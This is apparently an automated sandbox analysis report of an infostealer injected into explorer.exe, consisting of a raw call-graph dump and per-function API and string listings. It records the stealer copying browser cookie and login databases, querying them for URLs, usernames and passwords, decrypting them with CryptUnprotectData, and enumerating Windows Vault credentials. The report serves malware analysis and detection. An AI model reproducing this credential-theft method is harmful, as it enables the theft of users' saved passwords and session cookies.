30f43d9 27437 30f4317 _alloca_probe RegOpenKeyW 27430->27437 27433 30f4317 25 API calls 27434 30f43f5 27433->27434 27435 30f4317 25 API calls 27434->27435 27436 30f4403 27435->27436 27438 30f43cf 27437->27438 27439 30f4343 RegEnumKeyExW 27437->27439 27438->27433 27440 30f43c4 RegCloseKey 27439->27440 27444 30f436d 27439->27444 27440->27438 27441 30f1953 6 API calls 27441->27444 27442 30f199d 9 API calls 27442->27444 27444->27441 27444->27442 27445 30f1011 3 API calls 27444->27445 27448 30f418a 16 API calls 27444->27448 27446 30f439b RegEnumKeyExW 27445->27446 27446->27444 27447 30f43c3 27446->27447 27447->27440 27448->27444 27761 31273c4 22 API calls 27762 30febd9 37 API calls 27763 31113ca 89 API calls 27856 3143dc8 24 API calls 27766 3109ff0 32 API calls 27767 31113ca 72 API calls 27858 30fc9ea _allmul _alldiv 27859 30f99e1 strncmp 27604 30f47fa 27611 30f479c 27604->27611 27607 30f479c 23 API calls 27608 30f4813 27607->27608 27609 30f479c 23 API calls 27608->27609 27610 30f481f 27609->27610 27612 30f1afe 10 API calls 27611->27612 27613 30f47af 27612->27613 27614 30f47f1 27613->27614 27615 30f199d 9 API calls 27613->27615 27614->27607 27616 30f47bf 27615->27616 27617 30f47ea 27616->27617 27619 30f1d4a 18 API calls 27616->27619 27618 30f1011 3 API calls 27617->27618 27618->27614 27619->27616 27860 30fd1f7 memset _allmul _allmul 27862 30f49f1 13 API calls 27863 31455eb IsProcessorFeaturePresent 26860 30fa40e 26861 30fa426 26860->26861 26862 30fa4a2 26860->26862 26861->26862 26864 30fa469 memcpy 26861->26864 26866 30fa44a memcpy 26861->26866 26863 30fa4cc ReadFile 26862->26863 26865 30fa524 26862->26865 26871 30fa501 26862->26871 26863->26862 26863->26865 26864->26862 26874 30fa2aa 17 API calls 26865->26874 26868 30fa45d 26866->26868 26869 30fa532 26869->26868 26870 30fa53e memset 26869->26870 26870->26868 26873 30fa1c6 18 API calls 26871->26873 26873->26868 26874->26869 27062 30f4406 27067 30f2e30 StrStrIW 27062->27067 27065 30f2e30 22 API calls 27066 30f443a 27065->27066 27068 30f2ebc 27067->27068 27069 30f2e57 27067->27069 27093 30f1000 GetProcessHeap RtlAllocateHeap 27068->27093 27070 30f19e5 9 API calls 27069->27070 27072 30f2e68 27070->27072 27072->27068 27094 30f1bc5 10 API calls 27072->27094 27073 30f2ed0 RegOpenKeyExW 27074 30f2eee 27073->27074 27075 30f2f68 27073->27075 27078 30f2f50 RegEnumKeyExW 27074->27078 27083 30f1953 6 API calls 27074->27083 27086 30f199d 9 API calls 27074->27086 27090 30f2e30 18 API calls 27074->27090 27092 30f1011 3 API calls 27074->27092 27076 30f1011 3 API calls 27075->27076 27080 30f2f6f 27076->27080 27078->27074 27079 30f2f5e RegCloseKey 27078->27079 27079->27075 27080->27065 27081 30f2e75 27082 30f2eb5 27081->27082 27085 30f1afe 10 API calls 27081->27085 27084 30f1011 3 API calls 27082->27084 27083->27074 27084->27068 27087 30f2e83 27085->27087 27086->27074 27088 30f2e91 27087->27088 27089 30f199d 9 API calls 27087->27089 27091 30f1011 3 API calls 27088->27091 27089->27088 27090->27074 27091->27082 27092->27074 27093->27073 27094->27081 27773 311f21c 23 API calls 27774 30fca01 _allmul _alldiv _allmul _alldiv 27866 30f581f _alldiv _allrem _allmul 27867 3129000 28 API calls 27868 3135401 memset memcpy memcpy memset memcpy 27778 3110e0c 22 API calls 27872 30f482b 14 API calls 27874 310943d 34 API calls 27876 312e024 93 API calls 27700 30ff433 27701 30ff445 27700->27701 27706 31023b9 27701->27706 27704 30ff47c 27705 30ff490 27704->27705 27714 30fe206 58 API calls 27704->27714 27707 31023d3 27706->27707 27711 3102473 27706->27711 27709 3102431 27707->27709 27718 3103451 43 API calls 27707->27718 27709->27711 27715 30f63f7 27709->27715 27711->27704 27712 310240f 27712->27709 27719 310235a 17 API calls 27712->27719 27714->27705 27717 30fbafc 20 API calls 27715->27717 27716 30f6400 27716->27711 27717->27716 27718->27712 27719->27709 27882 3137452 19 API calls 27095 30f3c40 27096 30f1b6a 2 API calls 27095->27096 27097 30f3c50 27096->27097 27098 30f3dfa 27097->27098 27131 30f1000 GetProcessHeap RtlAllocateHeap 27097->27131 27100 30f3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27132 3144bec 27100->27132 27102 30f3dec DeleteFileW 27103 30f1011 3 API calls 27102->27103 27103->27098 27104 30f3c9a 27104->27102 27105 30f3de3 27104->27105 27143 30f1000 GetProcessHeap RtlAllocateHeap 27104->27143 27151 3143848 27105->27151 27108 30f3cce 27144 31102ec 94 API calls 27108->27144 27110 30f3da8 27147 310fb92 93 API calls 27110->27147 27112 30f3db1 lstrlen 27113 30f3ddc 27112->27113 27114 30f3db9 27112->27114 27115 30f1011 3 API calls 27113->27115 27148 30f1798 lstrlen 27114->27148 27115->27105 27116 30f1fa7 19 API calls 27125 30f3cd9 27116->27125 27118 30f3dc8 27149 30f1798 lstrlen 27118->27149 27120 30f3d2b lstrlen 27122 30f3d35 lstrlen 27120->27122 27120->27125 27121 30f3dd2 27150 30f1798 lstrlen 27121->27150 27122->27125 27125->27110 27125->27116 27125->27120 27145 30f1000 GetProcessHeap RtlAllocateHeap 27125->27145 27146 31102ec 94 API calls 27125->27146 27127 30f3d46 wsprintfA lstrlen 27128 30f3d83 lstrcat 27127->27128 27129 30f3d71 27127->27129 27130 30f1011 3 API calls 27128->27130 27129->27128 27130->27125 27131->27100 27154 314307c 27132->27154 27134 3144c01 27142 3144c44 27134->27142 27164 310c54d memset 27134->27164 27136 3144c18 27165 310c871 21 API calls 27136->27165 27138 3144c2a 27166 310c518 19 API calls 27138->27166 27140 3144c33 27140->27142 27167 314486f 89 API calls 27140->27167 27142->27104 27143->27108 27144->27125 27145->27127 27146->27125 27147->27112 27148->27118 27149->27121 27150->27113 27189 31437cb 27151->27189 27156 3143095 27154->27156 27163 314308e 27154->27163 27155 31430ad 27158 31430ed memset 27155->27158 27155->27163 27156->27155 27181 30f66ce 17 API calls 27156->27181 27159 3143108 27158->27159 27160 3143116 27159->27160 27182 30fc59d 17 API calls 27159->27182 27160->27163 27168 30f6512 27160->27168 27163->27134 27164->27136 27165->27138 27166->27140 27167->27142 27183 30f685c 27168->27183 27170 30f651d 27170->27163 27171 30f6519 27171->27170 27172 30fbfec GetSystemInfo 27171->27172 27186 30f65bd 27172->27186 27174 30fc00e 27175 30f65bd 16 API calls 27174->27175 27176 30fc01a 27175->27176 27177 30f65bd 16 API calls 27176->27177 27178 30fc026 27177->27178 27179 30f65bd 16 API calls 27178->27179 27180 30fc032 27179->27180 27180->27163 27181->27155 27182->27160 27184 314307c 17 API calls 27183->27184 27185 30f6861 27184->27185 27185->27171 27187 314307c 17 API calls 27186->27187 27188 30f65c2 27187->27188 27188->27174 27190 31437d6 27189->27190 27200 31437e9 27189->27200 27201 30f95b5 17 API calls 27190->27201 27192 31437db 27193 31437df 27192->27193 27195 31437eb 27192->27195 27202 3144da0 17 API calls 27193->27202 27196 3143834 27195->27196 27198 314381f 27195->27198 27204 3143865 71 API calls 27196->27204 27203 30f8795 22 API calls 27198->27203 27200->27102 27201->27192 27202->27200 27203->27200 27204->27200 27884 30f4440 24 API calls 27885 3116440 94 API calls 27424 30f105d VirtualFree 27783 3159238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 27786 30f5e5a 28 API calls 27788 31113ca 102 API calls 27789 3116e71 21 API calls 27886 3116871 8 API calls 27790 3110670 _allmul _allmul _allmul _alldvrm 27887 30f4c6d 17 API calls 27892 314507d 24 API calls 27893 310807c 23 API calls 27896 30fb079 20 API calls 27897 3132864 25 API calls 27794 3123e6b 20 API calls 27898 310f86a 31 API calls 27798 3106698 30 API calls 27902 3132c9e 104 API calls 27801 3100284 39 API calls 27802 30f629a 23 API calls 27449 30f3098 27450 30f1b6a 2 API calls 27449->27450 27453 30f30af 27450->27453 27451 30f33a9 27453->27451 27473 30f1000 GetProcessHeap RtlAllocateHeap 27453->27473 27454 30f30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27455 3144bec 89 API calls 27454->27455 27458 30f3126 27455->27458 27456 30f339b DeleteFileW 27457 30f1011 3 API calls 27456->27457 27457->27451 27458->27456 27459 30f3392 27458->27459 27474 31102ec 94 API calls 27458->27474 27461 3143848 76 API calls 27459->27461 27461->27456 27462 30f3381 27477 310fb92 93 API calls 27462->27477 27465 30f32cd CryptUnprotectData 27471 30f3155 27465->27471 27466 30f319c RtlCompareMemory 27466->27465 27466->27471 27467 30f1fa7 19 API calls 27467->27471 27468 30f31d0 RtlZeroMemory 27475 30f1000 GetProcessHeap RtlAllocateHeap 27468->27475 27470 30f1011 3 API calls 27470->27471 27471->27462 27471->27465 27471->27466 27471->27467 27471->27468 27471->27470 27472 30f1798 lstrlen 27471->27472 27476 31102ec 94 API calls 27471->27476 27472->27471 27473->27454 27474->27471 27475->27471 27476->27471 27477->27459 27906 313348f 27 API calls 27575 30f9ea7 RtlAllocateHeap 27576 30f9ed9 27575->27576 27577 30f9ec1 27575->27577 27579 30f7f70 17 API calls 27577->27579 27579->27576 27806 31113ca 89 API calls 27907 31113ca 87 API calls 27908 31078b9 33 API calls 27580 30f2ea5 25 API calls 27807 31112bb _allmul _allmul _allmul _alldvrm _allmul 27584 30f24a4 27587 30f2198 RtlZeroMemory GetVersionExW 27584->27587 27588 30f21cb LoadLibraryW 27587->27588 27590 30f21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27588->27590 27591 30f249b 27588->27591 27592 30f2492 FreeLibrary 27590->27592 27600 30f2244 27590->27600 27592->27591 27593 30f247b 27593->27592 27594 30f2365 RtlCompareMemory 27594->27600 27595 30f22e1 RtlCompareMemory 27595->27600 27596 30f1953 6 API calls 27596->27600 27597 30f23f8 StrStrIW 27597->27600 27598 30f1011 GetProcessHeap RtlFreeHeap VirtualQuery 27598->27600 27599 30f17c0 9 API calls 27599->27600 27600->27592 27600->27593 27600->27594 27600->27595 27600->27596 27600->27597 27600->27598 27600->27599 27808 30f56a2 _allrem 27810 30f96bc _alldiv _alldiv _alldiv _alldiv _allmul 27909 310b8a6 90 API calls 27910 3117ca6 19 API calls 27669 30f2cb5 27670 30f2cbe 27669->27670 27671 30f1953 6 API calls 27670->27671 27672 30f2cc3 27671->27672 27673 30f2e17 27672->27673 27674 30f1953 6 API calls 27672->27674 27675 30f2cd9 27674->27675 27698 30f1000 GetProcessHeap RtlAllocateHeap 27675->27698 27677 30f2ce9 27699 30f1000 GetProcessHeap RtlAllocateHeap 27677->27699 27679 30f2cf9 27680 30f1b6a 2 API calls 27679->27680 27681 30f2d04 27680->27681 27682 30f2d0c GetPrivateProfileSectionNamesW 27681->27682 27683 30f2ded 27681->27683 27682->27683 27684 30f2d22 27682->27684 27685 30f1011 3 API calls 27683->27685 27684->27683 27689 30f2d3f StrStrIW 27684->27689 27691 30f2dd7 lstrlenW 27684->27691 27696 30f1953 6 API calls 27684->27696 27697 30f1011 3 API calls 27684->27697 27686 30f2e02 27685->27686 27687 30f1011 3 API calls 27686->27687 27688 30f2e09 27687->27688 27690 30f1011 3 API calls 27688->27690 27689->27691 27692 30f2d53 GetPrivateProfileStringW 27689->27692 27693 30f2e10 27690->27693 27691->27683 27691->27684 27692->27691 27694 30f2d72 GetPrivateProfileIntW 27692->27694 27695 30f1011 3 API calls 27693->27695 27694->27684 27695->27673 27696->27684 27697->27684 27698->27677 27699->27679 27911 310b0aa 84 API calls 27912 30f48b1 22 API calls 27913 30f6eb7 24 API calls 27918 30f6eb7 22 API calls 27919 30f5cc5 22 API calls 27816 311c6da 23 API calls 27920 31270de 24 API calls 27923 3105cca 32 API calls 27821 311faca _allmul strcspn 27924 31434ca 57 API calls 27925 30ff4ec 20 API calls 27823 3129ef6 114 API calls 27569 30f9ee8 27570 30f9f1a 27569->27570 27571 30f9ef1 RtlFreeHeap 27569->27571 27571->27570 27572 30f9f02 27571->27572 27574 30f7f70 17 API calls 27572->27574 27574->27570 27620 30f28f8 27621 30f2ac8 27620->27621 27622 30f2900 27620->27622 27623 3143848 76 API calls 27621->27623 27652 30f1000 GetProcessHeap RtlAllocateHeap 27622->27652 27625 30f2ad1 DeleteFileW 27623->27625 27627 30f1011 3 API calls 27625->27627 27626 30f290e 27653 31102ec 94 API calls 27626->27653 27629 30f2adf 27627->27629 27631 30f2a98 lstrlen 27632 30f2aa4 27631->27632 27633 30f2ac1 27631->27633 27658 30f1798 lstrlen 27632->27658 27635 30f1011 3 API calls 27633->27635 27635->27621 27636 30f1fa7 19 API calls 27646 30f2919 27636->27646 27637 30f2ab1 27659 30f1798 lstrlen 27637->27659 27639 30f2ab9 27660 30f1798 lstrlen 27639->27660 27641 30f29da lstrlen 27642 30f29eb lstrlen 27641->27642 27641->27646 27642->27646 27645 30f2a8b 27657 310fb92 93 API calls 27645->27657 27646->27636 27646->27641 27646->27645 27654 30f1000 GetProcessHeap RtlAllocateHeap 27646->27654 27655 30f2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27646->27655 27656 31102ec 94 API calls 27646->27656 27648 30f2a25 wsprintfA lstrlen 27649 30f2a6a lstrcat 27648->27649 27650 30f2a58 27648->27650 27651 30f1011 3 API calls 27649->27651 27650->27649 27651->27646 27652->27626 27653->27646 27654->27646 27655->27648 27656->27646 27657->27631 27658->27637 27659->27639 27660->27633 27927 30f4cf5 memset

                                                                                                        Executed Functions

                                                                                                        Function 030F3717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 30f3717-30f3730 call 30f1b6a 3 30f3c37-30f3c3d 0->3 4 30f3736-30f374c 0->4 5 30f374e-30f375e call 30f302d 4->5 6 30f3762-30f379c call 30f1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->6 5->6 11 30f379e-30f37a3 call 30f349b 6->11 12 30f37a8-30f37b5 call 3144bec 6->12 11->12 16 30f37bb-30f37d3 call 312eeb8 12->16 17 30f3c15-30f3c1e DeleteFileW call 30f1011 12->17 22 30f3c0c-30f3c10 call 3143848 16->22 23 30f37d9-30f37f1 call 30f1000 call 31102ec 16->23 21 30f3c23-30f3c28 17->21 21->3 24 30f3c2a-30f3c32 call 30f2ffa 21->24 22->17 31 30f37f7 23->31 32 30f3bd0-30f3be3 call 310fb92 lstrlen 23->32 24->3 34 30f37fc-30f3816 call 30f1fa7 31->34 37 30f3c05-30f3c07 call 30f1011 32->37 38 30f3be5-30f3c00 call 30f1798 * 3 32->38 42 30f381c-30f382d 34->42 43 30f3bb6-30f3bc6 call 31102ec 34->43 37->22 38->37 46 30f3a37-30f3a51 CryptUnprotectData 42->46 47 30f3833-30f3843 RtlCompareMemory 42->47 43->34 53 30f3bcc 43->53 46->43 50 30f3a57-30f3a5c 46->50 47->46 48 30f3849-30f384b 47->48 48->46 52 30f3851-30f3856 48->52 50->43 54 30f3a62-30f3a78 call 30f1fa7 50->54 52->46 56 30f385c-30f3861 52->56 53->32 61 30f3a7a-30f3a80 54->61 62 30f3a86-30f3a9d call 30f1fa7 54->62 56->46 59 30f3867-30f38ed RtlZeroMemory call 30f1000 56->59 73 30f3a2e-30f3a32 59->73 74 30f38f3-30f3909 call 30f1fa7 59->74 61->62 64 30f3a82 61->64 68 30f3a9f-30f3aa5 62->68 69 30f3aab-30f3ac2 call 30f1fa7 62->69 64->62 68->69 71 30f3aa7 68->71 79 30f3ac4-30f3aca 69->79 80 30f3ad0-30f3aed call 30f1fa7 69->80 71->69 77 30f3bb1 call 30f1011 73->77 83 30f390b-30f3911 74->83 84 30f3917-30f392d call 30f1fa7 74->84 77->43 79->80 82 30f3acc 79->82 90 30f3aef-30f3af1 80->90 91 30f3af7-30f3b01 80->91 82->80 83->84 86 30f3913 83->86 92 30f392f-30f3935 84->92 93 30f393b-30f3952 call 30f1fa7 84->93 86->84 90->91 94 30f3af3 90->94 95 30f3b0f-30f3b1b lstrlen 91->95 96 30f3b03-30f3b05 91->96 92->93 97 30f3937 92->97 103 30f3954-30f395a 93->103 104 30f3960-30f3979 call 30f1fa7 93->104 94->91 95->43 100 30f3b21-30f3b2a lstrlen 95->100 96->95 99 30f3b07-30f3b0b 96->99 97->93 99->95 100->43 102 30f3b30-30f3b4f call 30f1000 100->102 110 30f3b59-30f3b93 call 30f2112 wsprintfA lstrlen 102->110 111 30f3b51 102->111 103->104 106 30f395c 103->106 112 30f397b-30f3981 104->112 113 30f3987-30f3993 lstrlen 104->113 106->104 118 30f3b95-30f3ba1 call 30f102f 110->118 119 30f3ba3-30f3baf lstrcat 110->119 111->110 112->113 115 30f3983 112->115 113->73 117 30f3999-30f39a2 lstrlen 113->117 115->113 117->73 120 30f39a8-30f39c7 call 30f1000 117->120 118->119 119->77 125 30f39c9 120->125 126 30f39d1-30f3a0b call 30f2112 wsprintfA lstrlen 120->126 125->126 129 30f3a0d-30f3a19 call 30f102f 126->129 130 30f3a1b-30f3a29 lstrcat call 30f1011 126->130 129->130 130->73
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F3778
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3782
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F3789
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3794
                                                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 030F383B
                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030F3870
                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 030F398B
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F399A
                                                                                                        • wsprintfA.USER32 ref: 030F39F1
                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 030F39FD
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3A21
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F3A49
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 030F3B13
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3B22
                                                                                                        • wsprintfA.USER32 ref: 030F3B79
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3B85
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3BA9
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 030F3BDA
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F3C16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                        • API String ID: 584740257-404540950
                                                                                                        • Opcode ID: a0a418b429739a899f18b34f6524f3e5fa9308bc1fdfd1c9593e1b216a2bf6f5
                                                                                                        • Instruction ID: 1f43145a1ef64fca1b4684a98e110f6f7dafb6cb918b6087005b0b75c78a49ac
                                                                                                        • Opcode Fuzzy Hash: a0a418b429739a899f18b34f6524f3e5fa9308bc1fdfd1c9593e1b216a2bf6f5
                                                                                                        • Instruction Fuzzy Hash: A0E1BF7820A341AFD719EF25C840B6FBBE9AFC9754F08496CF6858B650DB35C844CB62
                                                                                                        Function 030F2198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 134 30f2198-30f21c9 RtlZeroMemory GetVersionExW 135 30f21cb-30f21d0 134->135 136 30f21d7-30f21dc 134->136 137 30f21de 135->137 138 30f21d2 135->138 136->137 139 30f21e3-30f21f6 LoadLibraryW 136->139 137->139 138->136 140 30f21fc-30f223e GetProcAddress * 5 139->140 141 30f249b-30f24a3 139->141 142 30f2244-30f224a 140->142 143 30f2492-30f249a FreeLibrary 140->143 142->143 144 30f2250-30f2252 142->144 143->141 144->143 145 30f2258-30f225a 144->145 145->143 146 30f2260-30f2265 145->146 146->143 147 30f226b-30f2277 146->147 148 30f227e-30f2280 147->148 148->143 149 30f2286-30f22a5 148->149 151 30f248b-30f248f 149->151 152 30f22ab-30f22b3 149->152 151->143 153 30f22b9-30f22c5 152->153 154 30f2483 152->154 155 30f22c9-30f22db 153->155 154->151 156 30f2365-30f2375 RtlCompareMemory 155->156 157 30f22e1-30f22f1 RtlCompareMemory 155->157 158 30f237b-30f23c9 call 30f1953 * 3 156->158 159 30f2452-30f2475 156->159 157->159 160 30f22f7-30f2348 call 30f1953 * 3 157->160 177 30f23e4-30f23ea 158->177 178 30f23cb-30f23dc call 30f1953 158->178 159->155 163 30f247b-30f247f 159->163 176 30f234e-30f2363 call 30f1953 160->176 160->177 163->154 189 30f23e0 176->189 180 30f23ec-30f23ee 177->180 181 30f2431-30f2433 177->181 178->189 186 30f242a-30f242c call 30f1011 180->186 187 30f23f0-30f23f2 180->187 183 30f243c-30f243e 181->183 184 30f2435-30f2437 call 30f1011 181->184 191 30f2447-30f2449 183->191 192 30f2440-30f2442 call 30f1011 183->192 184->183 186->181 187->186 193 30f23f4-30f23f6 187->193 189->177 191->159 197 30f244b-30f244d call 30f1011 191->197 192->191 193->186 196 30f23f8-30f2406 StrStrIW 193->196 198 30f2408-30f2421 call 30f17c0 * 3 196->198 199 30f2426 196->199 197->159 198->199 199->186
                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 030F21AF
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 030F21BE
                                                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 030F21E8
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 030F220A
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 030F2214
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 030F2220
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 030F222A
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 030F2236
                                                                                                        • RtlCompareMemory.NTDLL(?,03151110,00000010), ref: 030F22E8
                                                                                                        • RtlCompareMemory.NTDLL(?,03151110,00000010), ref: 030F236C
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 030F23FE
                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 030F2493
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                        • API String ID: 2583887280-2831467701
                                                                                                        • Opcode ID: 0ddb32425ae848bb713f758caa231796d7e888866b710679159cbee468ff7c98
                                                                                                        • Instruction ID: 7dcb4dece70b4824222f4149cbf5e0a6bcb11a060615cfd4a2b55a90a2a870ff
                                                                                                        • Opcode Fuzzy Hash: 0ddb32425ae848bb713f758caa231796d7e888866b710679159cbee468ff7c98
                                                                                                        • Instruction Fuzzy Hash: B091C075A093009FD718DF65C884A6FBBE9BFC8704F04482DF6959B651DBB0E841CB52
                                                                                                        Function 030F3098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 261 30f3098-30f30b1 call 30f1b6a 264 30f33ba-30f33c0 261->264 265 30f30b7-30f30cd 261->265 266 30f30cf-30f30d8 call 30f302d 265->266 267 30f30e3-30f3128 call 30f1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 3144bec 265->267 271 30f30dd-30f30df 266->271 274 30f312e-30f3146 call 312eeb8 267->274 275 30f339b-30f33a4 DeleteFileW call 30f1011 267->275 271->267 280 30f314c-30f3158 call 31102ec 274->280 281 30f3392-30f3396 call 3143848 274->281 279 30f33a9-30f33ab 275->279 279->264 282 30f33ad-30f33b5 call 30f2ffa 279->282 287 30f315e-30f3161 280->287 288 30f3389-30f338d call 310fb92 280->288 281->275 282->264 290 30f3165-30f317f call 30f1fa7 287->290 288->281 293 30f336f-30f337b call 31102ec 290->293 294 30f3185-30f3196 290->294 293->290 302 30f3381-30f3385 293->302 296 30f32cd-30f32e7 CryptUnprotectData 294->296 297 30f319c-30f31ac RtlCompareMemory 294->297 296->293 300 30f32ed-30f32f2 296->300 297->296 298 30f31b2-30f31b4 297->298 298->296 301 30f31ba-30f31bf 298->301 300->293 303 30f32f4-30f330a call 30f1fa7 300->303 301->296 305 30f31c5-30f31ca 301->305 302->288 308 30f330c-30f3312 303->308 309 30f3318-30f332f call 30f1fa7 303->309 305->296 307 30f31d0-30f3253 RtlZeroMemory call 30f1000 305->307 319 30f32bd 307->319 320 30f3255-30f326b call 30f1fa7 307->320 308->309 311 30f3314 308->311 315 30f333d-30f3343 309->315 316 30f3331-30f3337 309->316 311->309 321 30f3345-30f334b 315->321 322 30f3351-30f336a call 30f1798 * 3 315->322 316->315 318 30f3339 316->318 318->315 324 30f32c1-30f32c8 call 30f1011 319->324 330 30f326d-30f3273 320->330 331 30f3279-30f328e call 30f1fa7 320->331 321->322 325 30f334d 321->325 322->293 324->293 325->322 330->331 335 30f3275 330->335 339 30f329c-30f32bb call 30f1798 * 3 331->339 340 30f3290-30f3296 331->340 335->331 339->324 340->339 341 30f3298 340->341 341->339
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F30F9
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3103
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F310A
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3115
                                                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 030F31A4
                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030F31D7
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F32DF
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F339C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                        • API String ID: 2757140130-4052020286
                                                                                                        • Opcode ID: 39819c3df31a0a5d30d195c2e0639cd45cdcc877577f6f9b12e4b269cb99a010
                                                                                                        • Instruction ID: c5636fd87ce23dcd9638210e018099b4661c6ef0a002721e08fcf36b02236600
                                                                                                        • Opcode Fuzzy Hash: 39819c3df31a0a5d30d195c2e0639cd45cdcc877577f6f9b12e4b269cb99a010
                                                                                                        • Instruction Fuzzy Hash: F891BC7920A341AFD754DF25C840E6FBBE9AFC9764F08092CF6859B650DB35D844CB22
                                                                                                        Function 030F3ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
